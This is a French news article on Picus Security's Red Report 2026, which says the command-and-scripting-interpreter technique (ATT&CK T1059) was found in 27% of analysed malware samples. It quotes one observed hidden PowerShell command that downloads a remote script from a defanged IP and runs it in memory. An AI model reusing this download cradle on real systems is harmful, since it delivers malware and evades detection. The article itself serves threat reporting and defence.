Picus Security : L'interpréteur de commandes et de scripts domine les cyberattaques
L'analyse de Picus Security révèle que la technique T1059 "Command and Scripting Interpreter" est la plus répandue dans les cyberattaques. Elle a été trouvée dans 27 % des échantillons de logiciels malveillants analysés en 2026.

La société de cybersécurité Picus Security a identifié la technique "Command and Scripting Interpreter" (ATT&CK T1059) comme étant la plus utilisée par les adversaires en 2026. Selon le rapport "{inline-style-removed}The Red Report 2026"{inline-style-added} de l'entreprise, cette technique était présente dans 27 % des près de 1,1 million d'échantillons de logiciels malveillants analysés, soit 294 498 instances.
La technique T1059 permet aux attaquants d'exécuter du code malveillant et des scripts sur les systèmes des victimes en exploitant les interfaces en ligne de commande natives et les moteurs de script tels que PowerShell, VBScript et Bash. Picus Security note son utilisation fréquente dans la phase "Initial Access" (Accès Initial), où elle facilite le téléchargement de charges utiles malveillantes ou l'exécution d'attaques "living-off-the-land" (LOLBins) qui se fondent dans les opérations normales du système.
Le rapport détaille des cas où des acteurs malveillants ont utilisé des commandes PowerShell pour récupérer à distance et exécuter des scripts malveillants directement en mémoire. Une commande observée, "powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('hxxp://185[.]73[.]125[.]8:80/a67'))"", montre comment les attaquants peuvent discrètement télécharger et exécuter des scripts, minimisant ainsi les artefacts sur disque et échappant à la détection.
En outre, l'analyse met en évidence l'application de la technique T1059 lors des phases "Execution" (Exécution) et "Persistence" (Persistance). Par exemple, sur macOS, des adversaires ont utilisé AppleScript pour déployer des logiciels malveillants et assurer leur persistance en contournant les contrôles de sécurité du système. Cette technique prévalente souligne le besoin critique pour les organisations de surveiller et restreindre l'utilisation des interpréteurs de script et de renforcer les mesures de sécurité des points d'extrémité.